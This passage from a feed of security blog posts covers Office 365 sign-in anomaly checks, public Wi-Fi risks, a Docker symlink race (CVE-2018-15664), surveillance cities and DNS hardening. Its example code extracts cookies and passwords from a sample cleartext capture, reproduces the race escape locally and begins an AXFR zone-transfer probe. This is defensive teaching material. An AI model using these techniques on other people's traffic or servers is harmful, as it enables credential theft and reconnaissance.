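    {"user": "dana@example.org", "time": "2019-05-28T08:02:00", "country": "US", "ok": True},
    {"user": "dana@example.org", "time": "2019-05-28T08:40:00", "country": "NG", "ok": True},
    {"user": "dana@example.org", "time": "2019-05-28T09:15:00", "country": "US", "ok": True},
    {"user": "eli@example.org",  "time": "2019-05-28T10:00:00", "country": "DE", "ok": False},
    {"user": "eli@example.org",  "time": "2019-05-28T10:01:00", "country": "DE", "ok": True},
]

# Constructed baseline: countries each user has historically signed in from.
BASELINE = {"dana@example.org": {"US"}, "eli@example.org": {"DE", "FR"}}


def _when(rec):
    return datetime.fromisoformat(rec["time"])


def impossible_travel(signins, min_gap=timedelta(hours=4)):
    """Consecutive successful sign-ins by the same user from different
    countries less than min_gap apart. Returns (user, from, to, time)."""
    last = {}
    hits = []
    for rec in signins:
        if not rec["ok"]:
            continue  # failed attempts say nothing about where the user is
        prev = last.get(rec["user"])
        if prev and prev["country"] != rec["country"] and _when(rec) - _when(prev) < min_gap:
            hits.append((rec["user"], prev["country"], rec["country"], rec["time"]))
        last[rec["user"]] = rec
    return hits


def new_country_success(signins, baseline):
    """Successful sign-ins from a country not in the user's baseline."""
    return [(r["user"], r["country"], r["time"]) for r in signins
            if r["ok"] and r["country"] not in baseline.get(r["user"], set())]


if __name__ == "__main__":
    for hit in impossible_travel(SIGNINS):
        print("impossible travel:", hit)
    for hit in new_country_success(SIGNINS, BASELINE):
        print("new country:", hit)
```

Both checks are noisy in practice (VPN exit points, mobile carriers that route through a neighbouring country), so use them to drive investigation rather than automatic lockout, and note that they only fire after the stolen credentials have been used. That is why the multi-factor authentication point in the list above comes first: it stops the login the phished password would otherwise grant.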

On the horizon

Cloud email services like Office 365 aren’t going anywhere. Given the many advantages that they present, there’s no reason they should. The fact is, given the current threat landscape, it’s often necessary to leverage additional security.

Based on a recent study conducted by ESG on behalf of Cisco, more than 80 percent of respondents reported that their organization is using SaaS email services. However, 43 percent of respondents still found that, after the move, they required secondary security technologies in order to shore up their email defenses.

At the end of the day, there are still valid needs for IT teams to set policies, gain visibility and control, utilize sandboxes, and leverage external blocking capabilities. Cloud email offers a lot of advantages, but to fully deliver on its promise, there is still a role for IT to ensure it is as secure as it can be.

Interested in reading more on email security? We’re about to launch the next installment in our Cybersecurity Report Series. “Email: Click with Caution, How to protect against phishing, fraud, and other scams” will be released early next month! Stay tuned…

Like this post? Subscribe to the Threat of the Month blog series and get alerted when the next blog post is released. 

The post Office 365 phishing appeared first on Cisco Blog.

Using Public Wi-Fi? Your data can be hacked easily! Here’s How…

Public Wi-Fi is easily accessible by everyone, as much as free surfing sounds cool, it is risky as well. Let’s see how your data can be hacked easily.

In the contemporary world of networking, Wi-Fi has become a vital commodity. Wi-Fi is now installed in almost every place regardless of its size; from international airports to small kiosks, you can find an Internet connection everywhere. Most of these networks are not operated for a single person but are open to all. Public Wi-Fi is easily accessible by everyone, be it customers of the shop or travelers passing by, and it is completely free. This means you can connect to the network and surf without paying a single dime.

Threats of Public Wi-Fi

Public Wi-Fi attracts millions of users each year. According to one survey, three out of four people connect to public Wi-Fi at some point, and do so without giving it a second thought. As much as free surfing sounds cool, it is risky as well. There are multiple threats associated with public Wi-Fi: it is an open network that can be accessed by anyone, and that anyone includes cybercriminals. Some common threats associated with public Wi-Fi are listed here to warn users how insecure it can be:

  • Hackers and Predators

Public Wi-Fi and hotspots are favorite hunting grounds for hackers and predators. On an open network, anything you send or receive that is not protected by encryption (such as HTTPS) can be read by anyone else on the network. That may include personal and secret details: emails, social media sessions, passwords, bank details and other crucial information. An attacker who inserts himself as the man in the middle between you and the sites you visit can record those details and use them later for any unauthorized or illegal purpose.

  • Device Hijacking

Hackers and other cybercriminals are smarter than you think. They not only watch your online activity but also look for ways to get into your device. If file sharing is turned on, your device is offering a service to everyone on the network. On a public network you may also be presented with fake "system update" files or prompts; often these are malware, which hijacks your device and allows cybercriminals to access all the data saved on it.

  • Malicious Networks

When you are out in the streets or in public places, your device sees many Wi-Fi networks. Some are protected with a password while others are open to all. An open public Wi-Fi is a real threat because it may have been set up by bad guys with wrong intentions, often with a name that mimics a legitimate hotspot. When your device connects to such a network, its operator controls your traffic: he can watch what you do, tamper with it and route it wherever he wants, and your device will show no notification of what is happening.

  • Cookie Theft

Cookie theft is one of the major risks of using unencrypted sites. Sites that do not use HTTPS (TLS, the successor of SSL) send their cookies in cleartext, so anyone who can see the traffic can copy a session cookie and use it to take over your logged-in session. The risk is far greater on public Wi-Fi, which provides no protection of its own against this kind of data theft.

  • Spying and Snooping

Spying on a user's activity becomes a lot easier on public Wi-Fi. Packet sniffers, or packet analyzers, are software (tcpdump and Wireshark are well-known examples) or dedicated hardware that network operators legitimately use to monitor traffic. They are trivial to set up, and anyone on an open network can run one and record every unencrypted packet that passes. The captured data reveals which sites you use, when, and, for unencrypted traffic, exactly what you sent.

  • Propagating of Viruses

Public Wi-Fi often serves as a medium for propagating malware. Computer worms are malware that spreads across a network on its own. Unlike classic viruses, which need a host program to run, a worm scans for other reachable devices and exploits vulnerable network services to infect them. On public Wi-Fi a large number of devices share the same network, so the chance that an infected neighbour reaches yours is high.
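To make the cookie theft and sniffing points concrete, here is an added example (written for this page, not part of the original post). It parses a constructed capture of a plain-HTTP login, the kind of bytes a sniffer on an open network would record, and pulls out what an attacker gets for free: the session cookie, the submitted password, and any cookie the site sets without the Secure and HttpOnly attributes. The host shop.example, the cookie names and the credentials are invented.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs

# Constructed sample traffic: one login request and its response, as a sniffer on an
# open network would see them when the site uses plain HTTP (no TLS). Not real data.
CAPTURED_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Cookie: session=abc123; theme=dark\r\n"
    b"Content-Length: 27\r\n"
    b"\r\n"
    b"user=alice&password=hunter2"
)
CAPTURED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: session=def456; Path=/\r\n"
    b"Set-Cookie: csrf=xyz789; Path=/; Secure; HttpOnly\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# Form field names that usually carry a secret.
SECRET_FIELD = re.compile(r"pass|pwd|secret|token", re.IGNORECASE)


def parse_http_message(raw: bytes) -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Split a raw HTTP/1.x message into start line, (name, value) headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def exposed_cookies(raw_request: bytes) -> Dict[str, str]:
    """Cookies the client sent in cleartext; replaying the session one hijacks the login."""
    _, headers, _ = parse_http_message(raw_request)
    cookies = {}
    for name, value in headers:
        if name == "cookie":
            for pair in value.split(";"):
                key, _, val = pair.strip().partition("=")
                cookies[key] = val
    return cookies


def exposed_credentials(raw_request: bytes) -> Dict[str, str]:
    """Password-like form fields submitted in a cleartext POST body."""
    start_line, headers, body = parse_http_message(raw_request)
    content_type = dict(headers).get("content-type", "")
    if not start_line.startswith("POST ") or "x-www-form-urlencoded" not in content_type:
        return {}
    fields = parse_qs(body.decode("latin-1"))
    return {k: v[0] for k, v in fields.items() if SECRET_FIELD.search(k)}


def weak_set_cookies(raw_response: bytes) -> List[str]:
    """Cookies set without both Secure and HttpOnly. A cookie lacking Secure is also
    sent over plain HTTP, so TLS on the login page alone does not protect it."""
    _, headers, _ = parse_http_message(raw_response)
    weak = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if not {"secure", "httponly"} <= attrs:
            weak.append(cookie_name)
    return weak


if __name__ == "__main__":
    print("cookies on the wire:", exposed_cookies(CAPTURED_REQUEST))
    print("credentials on the wire:", exposed_credentials(CAPTURED_REQUEST))
    print("cookies set without Secure/HttpOnly:", weak_set_cookies(CAPTURED_RESPONSE))
```

The same three functions can be pointed at a real capture exported from tcpdump or Wireshark; the point is that nothing in them needs to "break" anything, because on plain HTTP the session, the password and the unprotected cookie are simply there.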

Tips to Stay Safe on Public Wi-Fi

Staying safe on the internet is not easy, and it gets harder on public Wi-Fi. Free Wi-Fi has its temptations, and in some situations it is unavoidable. Public Wi-Fi can never be completely secure, but a few tips will make your online presence less vulnerable.

  • Enable Wi-Fi Only When Needed

Keep your device's Wi-Fi turned off in public places and enable it only when you need it. This may seem an unnecessary hassle for frequent users, but it matters in public: with Wi-Fi on, your device scans for every network in range and may automatically join any open network or any network whose name it remembers. As long as Wi-Fi is active, your device is at constant risk of joining a malicious network and being reached by worms.

  • Never Connect with Unknown Wi-Fi

Password-protected public Wi-Fi is somewhat safer than an open network and is the better choice, because the password limits who can join. It is not a guarantee, though: on a network that uses a single shared passphrase (WPA2-Personal), anyone who knows that passphrase and captures your connection handshake can still decrypt your traffic, so the other people in the cafe remain a threat. If you really need an open public network, confirm its exact name with staff before connecting. Rogue hotspots usually use names that closely resemble the real business Wi-Fi, and it is easy to fall prey to them if you are not careful.

  • Browse Safely

Always be cautious about which sites you browse; the web is full of scams and cons, and the risk multiplies on public Wi-Fi. Sites that encrypt your traffic use HTTPS, shown by https:// in the address and a lock icon in the address bar; they use a TLS (formerly SSL) connection. A site served over plain HTTP sends everything, including logins, cookies and form data, in cleartext, which is a risk on any network and a serious one when the Wi-Fi itself is untrusted.

  • Be Vigilant While Sharing Information

When you are on public Wi-Fi, all data to and from your device that is not encrypted is exposed to spying and snooping. Be careful about what you share and never carry out important transactions over open networks. Your bank details and crucial business documents should not be put at risk through mere negligence.

Also, limit your social media use on public hotspots, as it paves the way for predators to your personal information. Logging in over a public network also gives cybercriminals a better chance at your account details and password, especially on sites that do not use HTTPS, and makes your accounts vulnerable to hijacking. To stay safe, log in only when needed and sign out as soon as your task is done.

  • Opt for VPN

A VPN (Virtual Private Network) is one of the safest ways to use an untrusted network. It routes all your traffic through an encrypted tunnel to a VPN server, usually located somewhere other than where you are, so the sites you visit see the VPN server's address rather than yours, which hides your real location and network identity from them.

Because the tunnel is encrypted, nobody on the local Wi-Fi network, including its operator or a rogue hotspot, can read or tamper with your traffic; all they see is encrypted data going to the VPN server. This moves trust to the VPN provider, which can see your traffic where it leaves the tunnel, so choose one with a credible reputation.

A VPN does not stop malware: it protects data in transit, not your device. It is usually a paid service, and it is worth the investment for anyone who uses public Wi-Fi regularly.

  • Secure Your Device

Your connection needs to be secure, and so does your device. Enable the firewall on your device. Its pop-up notifications can be annoying, but it blocks unsolicited inbound connections from other devices on the network, which is exactly what you want on shared Wi-Fi. Even if you prefer to keep the firewall off most of the time, enable it at least while using public Wi-Fi.

Anti-virus and anti-malware software is a must for device security. It protects against known malware and alerts you to suspicious activity on the device. Keeping it up to date becomes even more important if you use public Wi-Fi often.

  • Forget the Network

Whenever you connect to a public network, remove the network and its password from your device when you leave. A saved network is joined automatically the next time your device sees its name, without any alert to you, and a rogue hotspot broadcasting the same name will be joined just the same, which puts your device at risk.

To Conclude

Public Wi-Fi cannot be avoided completely. It lets you connect with the world while on the go and without paying any money, and it is available everywhere from educational institutes to office buildings. Whether you are abroad on business or on vacation, free public Wi-Fi is certainly a convenience.

There are a number of threats associated with public Wi-Fi, especially networks without password protection, but you can keep yourself safe by following simple precautions. These safety tips protect you from the common tricks and scams of hackers. If you are a frequent public Wi-Fi user, invest in a reputable paid VPN and up-to-date anti-virus software to protect your device and online transactions.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

About the author:

Susan Alexandra is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor in cryptocurrencies. Susan's inbox is open for new ideas and stories; you can share story ideas at susanalexandra67(at)gmail(dot)com

Pierluigi Paganini

(Security Affairs – Public Wi-Fi, hacking)

The post Using Public Wi-Fi? Your data can be hacked easily! Here’s How… appeared first on Security Affairs.

Know Your Limitations

At the end of the 1973 Clint Eastwood movie Magnum Force, after Dirty Harry watches his corrupt police captain explode in a car, he says "a man's got to know his limitations."

I thought of this quote today as the debate rages about compromising municipalities and other information technology-constrained yet personal information-rich organizations.

Several years ago I wrote If You Can't Protect It, Don't Collect It. I argued that if you are unable to defend personal information, then you should not gather and store it.

In a similar spirit, here I argue that if you are unable to securely operate information technology that matters, then you should not be supporting that IT.

You should outsource it to a trustworthy cloud provider, and concentrate on managing secure access to those services.

If you cannot outsource it, and you remain incapable of defending it natively, then you should integrate a capable managed security provider.

It's clear to me that a large portion of those running PI-processing IT are simply not capable of doing so in secure manner, and they do not bear the full cost of PI breaches.

They have too many assets, with too many vulnerabilities, and are targeted by too many threat actors.

These organizations lack sufficient people, processes, and technologies to mitigate the risk.

They have successes, but they are generally due to the heroics of individual IT and security professionals, who often feel out-gunned by their adversaries.

If you can't patch a two-year-old vulnerability prior to exploitation, or detect an intrusion and respond to the adversary before he completes his mission, then you are demonstrating that you need to change your entire approach to information technology.

The security industry seems to think that throwing more people at the problem is the answer, yet year after year we read about several million job openings that remain unfilled. This is a sign that we need to change the way we are doing business. The fact is that those organizations that cannot defend themselves need to recognize their limitations and change their game.

I recognize that outsourcing is not a panacea. Note that I emphasized "IT" in my recommendation. I do not see how one could outsource the critical technology running on-premise in the industrial control system (ICS) world, for example. Those operations may need to rely more on outsourced security providers, if they cannot sufficiently detect and respond to intrusions using in-house capabilities.

Remember that the vast majority of organizations do not exist to run IT. They run IT to support their lines of business. Many older organizations have indeed been migrating legacy applications to the cloud, and most new organizations are cloud-native. These are hopeful signs, as the older organizations could potentially "age-out" over time.

This puts a burden on the cloud providers, who fall into the "managed service provider" category that I wrote about in my recent Corelight blog. However, the more trustworthy providers have the people, processes, and technology in place to handle their responsibilities in a more secure way than many organizations who are struggling with on-premise legacy IT.

Everyone's got to know their limitations.

Episode 502 – Encryption Is Usually Deployed Improperly

Encryption is a powerful and effective solution for protecting your data and resources. However, it is complicated to implement, and a recent research report found that most organizations deploy it poorly. This episode talks about the challenges of encryption implementations. Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security […]

The post Episode 502 – Encryption Is Usually Deployed Improperly appeared first on Security In Five.

All Docker versions affected by an unpatched race condition issue

A race condition flaw that could be exploited by an attacker to read and write any file on the host system affects all versions of Docker.

Experts found a race condition vulnerability that affects all versions of Docker; it could be exploited by an attacker to read and write any file on the host system.

Technically the flaw, tracked as CVE-2018-15664, is a time-of-check to time-of-use (TOCTOU) bug: the state of the system changes between the check of a condition (here, that a path resolves inside the container) and the use of the result of that check.

“In Docker through 18.06.1-ce-rc2, the API endpoints behind the ‘docker cp‘ command are vulnerable to a symlink-exchange attack with Directory Traversal, giving attackers arbitrary read-write access to the host filesystem with root privileges, because daemon/archive.go does not do archive operations on a frozen filesystem (or from within a chroot).” reads the description for this issue.

docker logo-696x364

The issue resides in the FollowSymlinkInScope function, which is meant to resolve a specified path safely. FollowSymlinkInScope is a wrapper around evalSymlinksInScope that returns an absolute path and handles paths in a platform-agnostic manner.

“If you’re not familiar with FollowSymlinkInScope, its job is to take a path and safely resolve it as though the process was inside the container. After the full path has been resolved, the resolved path is passed around a bit and then operated on a bit later (in the case of ‘docker cp’ it is opened when creating the archive that is streamed to the client).” reads the advisory published by SUSE. “As you may notice, if an attacker can add a symlink component to the path after the resolution but before it is operated on, then you could end up resolving the symlink path component on the host as root. In the case of ‘docker cp’ this gives you read and write access to any path on the host.”

The affected code path is the one behind the 'docker cp' utility, which copies content between a container and the local filesystem.

“As far as I’m aware there are no meaningful protections against this kind of attack (other than not allowing “docker cp” on running containers — but that only helps with his particular attack through FollowSymlinkInScope). Unless you have restricted the Docker daemon through AppArmor, then it can affect the host filesystem,” continues the advisory.

A possible attack scenario is an attacker who is active inside a container while the host administrator runs docker cp to copy data into or out of that container.

Aleksa Sarai, the senior software engineer who discovered the issue, proposes as the complete fix a modification of 'chrootarchive' so that archive operations run with the container's rootfs as the root.

“The most complete solution to this problem would be to modify chrootarchive so that all of the archive operations occur with the root as the container rootfs (and not the parent directory, which is what causes the vulnerability since the parent is attacker-controlled),” said Sarai.

“Unfortunately, changes to this core piece of Docker are almost impossible (the TarUntar interface has many copies and reimplementations that would all need to be modified to be able to handle a new ‘root’ argument).”

Since that change touches a core part of Docker, it may not be feasible in the short term.

Another mitigation is to pause the container while its filesystem is being accessed. A paused container cannot race the copy, so this protects against the more basic attacks that exploit the issue, but it is not a complete fix.

At the time of writing, a security patch has been submitted upstream and is currently under review.

Aleksa Sarai also developed two scripts to trigger the vulnerability and get respectively read and write access to the host system.

“Attached is a fairly dumb reproducer which basically does a RENAME_EXCHANGE of a symlink to “/” and an empty directory in a loop, hoping to hit the race condition. Then our “user” attempts to copy a file from the path repeatedly.” explained the expert. “You can call it like this (note that since this requires exploiting a race condition, only a small percentage of the attempts succeed — however if I had made my reproducer a bit more clever about how quickly it does the RENAME_EXCHANGE it could be more likely to hit the race).”

The expert reported a success rate of about 0.6% per attempt for his reproducer. That sounds low, but the attacker can keep trying in a loop, so running it for a dozen seconds or so is usually enough to win the race.
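As an added illustration (example code written for this page, not Docker's code or Sarai's reproducer), the Python below contrasts the two shapes described above. resolve_then_open resolves and checks a string path and only later opens it, and a hook stands in for the attacker winning the race by swapping a directory for a symlink in between. open_in_scope instead walks the path one component at a time relative to a directory descriptor with O_NOFOLLOW, which is the spirit of doing the archive operations with the container rootfs as the root. The throwaway rootfs, the 'outside' directory standing in for the host filesystem, and the file names are constructed for the demo; it runs on Linux or macOS.

```python
import errno
import os
import shutil
import tempfile


def resolve_then_open(root: str, rel_path: str, race=None) -> int:
    """Vulnerable shape: resolve and check the path, then later open the path string.

    The kernel resolves symlinks again at open() time, so a component swapped
    between the check and the open is followed on the host side. ``race`` is a
    hook that stands in for the attacker winning the race (demo only).
    """
    root = os.path.realpath(root)
    candidate = os.path.join(root, rel_path)
    resolved = os.path.realpath(candidate)          # check: does it stay in scope?
    if resolved != root and not resolved.startswith(root + os.sep):
        raise PermissionError(f"{rel_path!r} resolves outside {root}")
    if race is not None:
        race()                                      # attacker swaps a component here
    return os.open(candidate, os.O_RDONLY)          # use: follows the new symlink


def open_in_scope(root: str, rel_path: str) -> int:
    """Safe shape: walk one component at a time relative to a directory fd with
    O_NOFOLLOW, so no component is ever resolved as a symlink on the host."""
    parts = [p for p in rel_path.split("/") if p not in ("", ".")]
    if ".." in parts:
        raise PermissionError("'..' components are not allowed")
    dirfd = os.open(root, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for i, part in enumerate(parts):
            flags = os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC
            if i < len(parts) - 1:
                flags |= os.O_DIRECTORY             # intermediate parts must be real dirs
            try:
                fd = os.open(part, flags, dir_fd=dirfd)
            except OSError as exc:
                if exc.errno in (errno.ELOOP, errno.EMLINK, errno.ENOTDIR):
                    raise PermissionError(f"refusing symlink component {part!r}") from exc
                raise
            os.close(dirfd)
            dirfd = fd
        return dirfd
    except BaseException:
        os.close(dirfd)
        raise


def read_fd(fd: int) -> str:
    """Read everything from fd and close it."""
    chunks = []
    try:
        while True:
            chunk = os.read(fd, 4096)
            if not chunk:
                return b"".join(chunks).decode()
            chunks.append(chunk)
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed scenario: a throwaway 'rootfs' holding data/secret.txt and an
    'outside' directory standing in for the host filesystem."""
    with tempfile.TemporaryDirectory() as base:
        rootfs = os.path.join(base, "rootfs")
        outside = os.path.join(base, "outside")
        os.makedirs(os.path.join(rootfs, "data"))
        os.makedirs(outside)
        with open(os.path.join(rootfs, "data", "secret.txt"), "w") as f:
            f.write("inside-container")
        with open(os.path.join(outside, "secret.txt"), "w") as f:
            f.write("host-secret")

        def attacker_swaps_data() -> None:
            # Stand-in for the RENAME_EXCHANGE loop: replace the real directory
            # with a symlink that points outside the rootfs.
            shutil.rmtree(os.path.join(rootfs, "data"))
            os.symlink(outside, os.path.join(rootfs, "data"))

        results = {}
        results["safe_before_race"] = read_fd(open_in_scope(rootfs, "data/secret.txt"))
        results["naive_no_race"] = read_fd(resolve_then_open(rootfs, "data/secret.txt"))
        results["naive_raced"] = read_fd(
            resolve_then_open(rootfs, "data/secret.txt", race=attacker_swaps_data))
        try:
            read_fd(open_in_scope(rootfs, "data/secret.txt"))
            results["safe_after_race"] = "escaped"
        except PermissionError:
            results["safe_after_race"] = "blocked"
        return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The naive opener passes its own check every time; it is the later open of a string path that hands the attacker the host file. The descriptor walk never re-resolves a string, so the swapped component is rejected rather than followed.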

Pierluigi Paganini

(SecurityAffairs – Docker, hacking)

The post All Docker versions affected by an unpatched race condition issue appeared first on Security Affairs.

When it comes to email-based threats, Emotet dominates

Emotet displaced credential stealers, stand-alone downloaders and RATs and became the most prominent threat delivered via email, Proofpoint has shared. According to the firm’s statistics, in Q1 2019 a whopping 61 percent of all malicious payloads distributed via email were Emotet. The nature of the malicious payloads Emotet started its life as a banking Trojan, but has morphed over time and became a malware multi-tool, capable of downloading additional malware, stealing passwords, performing brute-force attacks … More

The post When it comes to email-based threats, Emotet dominates appeared first on Help Net Security.

Global Privacy Concerns: The World’s Top Five Cities Using Invasive Technology

Cities are expanding their technological reach. Many of their efforts work to increase public protections, such as using GPS tracking to help first responders quickly locate the site of a car accident. But, in the rush for a more secure and technologically advanced city, privacy can fall by the wayside. We’ve reviewed the top cities around the world that are using technologies that may invade citizens’ privacy, so you know what to expect and what you can do. 

Beijing, China 

China is infamous for its mass surveillance, with Beijing often serving as a testing ground for new surveillance software. The Chinese government uses internet monitoring, GPS tracking, and the “world’s biggest camera surveillance system”, with more than 170 million CCTV cameras to monitor the country’s populace. These CCTV cameras are backed by powerful facial recognition algorithms, which can track an individual down in just seven minutes. It is safe to say that you are probably being monitored anywhere you travel while in China, but a general rule is that, the higher the population, the more surveillance there is.  

The town of Yizhuang has more than 2,243 high definition security cameras, 277 vehicle recognition cameras, and 267 facial recognition cameras. It also features six patrol vehicles with mobile cameras, and enforcement officers equipped with video capture equipment. Each of these cameras is sending live video streams to a main control center 24/7—all to monitor a single 11-square-mile suburb of Beijing. 

Beijing is also preparing to roll out a social credit system in 2020. This system will award personal trustworthiness points to citizens and businesses based on their financial credit scores, as well as their personal and professional behavior. In the meantime, how the Chinese government plans to use this system to reward or punish its citizens remains a mystery. 

Moscow, Russia 

Not one to be outdone, Russia has also embraced mass CCTV surveillance. Moscow alone has more than 170,000 cameras, making it the most surveilled city in Russia. Facial recognition software is paired with this massive network of cameras to track down persons of interest, though exactly what defines a “person of interest” is somewhat nebulous. In fact, a Moscow official recently admitted that the city “can now trace the debtors’ movements,” thanks to this network of CCTV cameras. He declined to say how many debtors have been traced using this technology, or how large their debts were.

Darwin, Australia 

Darwin, Australia is piloting a surveillance system similar to the technologies used in China, with some warning that it could evolve into a social credit system. Darwin has installed poles throughout the city outfitted with speakers, cameras, and WiFi. These monitoring stations track people and their movements all around the city, and are aided by facial recognition software. They can even respond to triggers, such as when a specific individual breaches a “virtual fence.” 

“We’ll be getting sent an alarm saying, ‘There’s a person in this area that you’ve put a virtual fence around.’ … Boom, an alert goes out to whatever authority, whether it’s us or police to say ‘Look at camera five,’” said Josh Sattler, the Darwin Council’s General Manager for Innovation, Growth, and Development services in an article with NT News.  

This system also tracks mobile phone use, web traffic, and mobile app usage—but only to help local businesses, of course. 

“[It will tell us] where people are using WiFi, what they’re using WiFi for, are they watching YouTube, etc., all these bits of information we can share with businesses… we can let businesses know ‘Hey, 80 percent of people actually use Instagram within this area of the city, between these hours,’” said Sattler. 

New York City, USA 

In an effort to assist its police force, NYC has turned to the world’s largest surveillance technology company—the Chinese state-owned Hikvision—to install the same surveillance tools being used in China. Thousands of surveillance cameras have been operating in New York City since 2014, using the same facial recognition software that enables law enforcement in Beijing to locate and track individuals within the city. These cameras are equipped with infrared sensors that help capture high resolution images even in very low light. The NYPD has direct access to this surveillance network, and monitors the footage remotely to avoid showing an obvious police presence. The full extent of the surveillance in New York is unknown, but reports indicate the NYPD is using these products on a “large scale.” 

Hillsboro, USA 

Hillsboro, Oregon is the smallest city on this list, with a population of just over 100,000. So why is such a small town on the same list as Beijing, Moscow, and New York? The Washington County Sheriff’s Office, which has jurisdiction over Hillsboro, recently became the first law enforcement agency in the United States to use Amazon’s AI-powered facial recognition tool, Rekognition. As this is the first real-world test of the technology, its accuracy is hotly debated. Many experts argue that it will likely lead to the wrongful arrest of innocent people whose only crime is bearing a resemblance to the accused.

More than 300,000 mug shots taken at the Washington County jail have been uploaded into the Rekognition system. These pictures can be cross-referenced with images from a security camera, social media accounts, or even a deputy’s mobile device—without requiring a warrant. More than 1,000 facial recognition searches were logged into the Rekognition system by the Washington County Sheriff’s Office, but public records requests show that only nine official case reports mention the use of the tool. Washington County deputies are under no imperative to note when facial recognition software assisted with an arrest, so we have no way to judge how accurate the system is. 

Your Privacy is Your Concern 

While the only way to avoid facial recognition is to hide or alter your face, there are precautions you can take to protect your digital privacy when visiting these cities. You can obscure your network traffic, which helps prevent the kind of Wi-Fi-based tracking reported in Darwin. Strong encryption is your best protection against privacy-invasive cities: use a reputable end-to-end encrypted voice and messaging service, and a trusted VPN to shield your web and mobile traffic from the local network. Encryption may not stop a state actor from intercepting your data, but it makes the intercepted data very hard to read; note that it does not hide which services you connect to from whoever operates the network or the VPN.

Have other tips for protecting your privacy while traveling? Let us know in the comments. 

The post Global Privacy Concerns: The World’s Top Five Cities Using Invasive Technology appeared first on Webroot Blog.

F5 ACI ServiceCenter app: Combine L2-3 network connectivity with L4-7 application services

F5 Networks is introducing the F5 ACI ServiceCenter app to seamlessly combine L2-3 network connectivity with L4-7 application services within Cisco ACI environments. Available through Cisco’s ACI App Center, this integration app enhances visibility and control throughout the network and application stack to help customers accelerate application deployment within flexible, software-defined IT infrastructures. F5’s participation in the Cisco ACI App Center gives joint customers the flexibility to deploy a full complement of services, such as … More

The post F5 ACI ServiceCenter app: Combine L2-3 network connectivity with L4-7 application services appeared first on Help Net Security.

How to Secure DNS Servers and Prevent Security Issues

Hackers often tend to target DNS software, aiming to cause security breaches. Let’s discuss how to secure DNS servers using some very effective methods. Here we go…

Using a DNS forwarder helps

Using a DNS forwarder is of great help when it comes to securing DNS servers. A DNS forwarder is simply a DNS server that performs queries on behalf of another DNS server, which offloads processing from the server that forwards to it and lets that server benefit from the forwarder's larger cache. Just as important, it keeps the internal DNS server from talking to Internet DNS servers itself, which matters most when that server hosts the resource records of the internal domain. So, rather than letting the internal DNS server perform recursion and contact Internet DNS servers directly, configure it to use a forwarder for all domains for which it is not authoritative.

How to secure DNS servers with DNS resolvers and DNS advertisers

Separating DNS resolvers from DNS advertisers helps greatly when it comes to securing DNS servers. A DNS resolver is a DNS server that performs recursion to resolve names in domains for which it is not authoritative. A DNS advertiser is a DNS server that answers queries only for the domains for which it is authoritative and does not recurse. The DNS resolver can be made available only to your internal users, or only to external users (giving them a secure alternative to using a DNS server outside your administrative control), or, if needed, to both. The DNS advertiser enhances security by preventing outsiders from using your public DNS server to resolve names in other domains, which also removes it as a target for cache poisoning and as an open resolver.

Caching-only DNS servers help increase security

Using a caching-only DNS server (which is not authoritative for any DNS domains) helps increase DNS security. Upon receiving a response, a caching-only DNS server caches the result and returns the answer to the system that issues the DNS query. Thus, the caching-only DNS server can, over time, amass a large cache of responses, thereby improving DNS response times for DNS clients of that server. Similarly, caching-only DNS servers can be used as forwarders too, thereby using them for performing recursion on behalf of the internal DNS servers. Thus, dependence on the ISP’s DNS servers can be avoided, thereby enhancing overall security.

Configure DNS servers to prevent cache pollution

Configuring DNS servers to prevent cache pollution is good. Thus, the DNS server cache wouldn’t be polluted with bogus entries and users would be protected from being forwarded to malicious websites. For Windows 2003, the DNS server is configured to prevent cache pollution by default. For Windows 2000 DNS server, it can be configured by opening the Properties dialog box for the DNS server, clicking the Advanced tab, then selecting the Prevent Cache Pollution checkbox and then finally restarting the DNS server.

Go for DDNS for secure connections only

DDNS (dynamic DNS) is a great help to DNS administrators, but unchecked dynamic updates pose a security risk: an attacker can have a host register an update for the DNS record of a file server, web server or database server and divert connections to a machine he controls. Hence it is important to accept dynamic updates only from authenticated clients; on Windows this is done by using Active Directory-integrated zones and requiring secure dynamic updates only.

Configure DNS servers to disable zone transfers

Disabling zone transfers greatly enhances DNS security. If zone transfers are allowed to anyone, anyone can send an AXFR request that makes the DNS server dump its entire zone, and that information is easily misused by a hacker: it reveals the organization's naming scheme and the hosts behind key infrastructure services, which can then be attacked. Configure DNS servers to deny zone transfer requests, or allow them only from the specific secondary servers that need them.
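As an added example (not from the original article), here is a small Python checker for the zone-transfer point. It builds an AXFR query, sends it over TCP to a nameserver you name, and reports whether the server refused or started handing out the zone. The responses in sample_responses are constructed for offline testing, not captured from any real server, and the example.com names are placeholders; run the live check only against servers you are responsible for.

```python
import socket
import struct

AXFR = 252                                   # QTYPE for a full zone transfer
RCODE_NAMES = {0: "NOERROR", 5: "REFUSED", 9: "NOTAUTH"}


def encode_name(name: str) -> bytes:
    """Wire-format a domain name as length-prefixed labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("idna")
        if not raw or len(raw) > 63:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_axfr_query(zone: str, txid: int = 0x1234) -> bytes:
    """12-byte header (QDCOUNT=1, RD clear: AXFR is asked of the authority) + question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
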